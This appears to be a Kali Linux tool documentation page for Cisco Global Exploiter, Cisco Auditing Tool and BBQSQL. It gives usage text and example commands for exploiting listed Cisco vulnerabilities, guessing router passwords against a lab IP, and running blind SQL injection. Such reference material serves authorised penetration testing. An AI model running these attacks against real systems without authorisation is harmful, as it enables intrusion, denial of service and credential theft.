cisco-global-exploiter – Simple and fast security testing tool

Tool Description

Cisco Global Exploiter (CGE), is an advanced, simple and fast security testing tool.

Tool Source: http://www.blackangels.it/

Kali Repo: http://git.kali.org/gitweb/?p=packages/cisco-global-exploiter.git;a=summary

General Details

root@kali:~# cge.pl

Usage :
perl cge.pl <target> <vulnerability number>

Vulnerabilities list :
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
[2] - Cisco IOS Router Denial of Service Vulnerability
[3] - Cisco IOS HTTP Auth Vulnerability
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
[6] - Cisco 675 Web Administration Denial of Service Vulnerability
[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
[11] - Cisco Catalyst Memory Leak Vulnerability
[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
[13] - 0 Encoding IDS Bypass Vulnerability (UTF)
[14] - Cisco IOS HTTP Denial of Service Vulnerability

Usage Example

Attack the target host (192.168.99.230) using the Cisco IOS HTTP Auth Vulnerability (3):

root@kali:~# cge.pl 192.168.99.230 3

Vulnerability successful exploited with [http://192.168.99.230/level/17/exec/....] ...

 Video Tutorial: Coming Soon!

cisco-auditing-tool – Scans Cisco routers for common vulnerabilities

Tool Description

Perl script which scans cisco routers for common vulnerabilities.

Tool Source: http://www.scrypt.net/

Kali Repo: http://git.kali.org/gitweb/?p=packages/cisco-auditing-tool.git;a=summary

General Details

root@kali:~# CAT

Cisco Auditing Tool - g0ne [null0]
Usage:
    -h hostname (for scanning single hosts)
    -f hostfile (for scanning multiple hosts)
    -p port #   (default port is 23)
    -w wordlist (wordlist for community name guessing)
    -a passlist (wordlist for password guessing)
    -i [ioshist]    (Check for IOS History bug)
    -l logfile  (file to log to, default screen)
    -q quiet mode   (no screen output)

Usage Example

Scan the host (-h 192.168.99.230) on port 23 (-p 23), using a password dictionary file (-a /usr/share/wordlists/nmap.lst):

root@kali:~# CAT -h 192.168.99.230 -p 23 -a /usr/share/wordlists/nmap.lst 

Cisco Auditing Tool - g0ne [null0]

Checking Host: 192.168.99.230


Guessing passwords: 

Invalid Password: 123456
Invalid Password: 12345

Video Tutorial: Coming Soon!

BBQSQL – SQL injection exploitation tool

Tool Description

Blind SQL injection can be a pain to exploit. When the available tools work they work well, but when they don’t you have to write something custom. This is time-consuming and tedious. BBQSQL can help you address those issues.

BBQSQL is a blind SQL injection framework written in Python. It is extremely useful when attacking tricky SQL injection vulnerabilities. BBQSQL is also a semi-automatic tool, allowing quite a bit of customisation for those hard to trigger SQL injection findings. The tool is built to be database agnostic and is extremely versatile. It also has an intuitive UI to make setting up attacks much easier. Python gevent is also implemented, making BBQSQL extremely fast.

Similar to other SQL injection tools you provide certain request information. You must provide the usual information:

  • URL
  • HTTP Method
  • Headers
  • Cookies
  • Encoding methods
  • Redirect behavior
  • Files
  • HTTP Auth
  • Proxies

Then specify where the injection is going and what syntax we are injecting.

Tool Source: https://github.com/Neohapsis/bbqsql/

Kali Repo: http://git.kali.org/gitweb/?p=packages/bbqsql.git;a=summary

General Details:

Video Tutorial: Coming Soon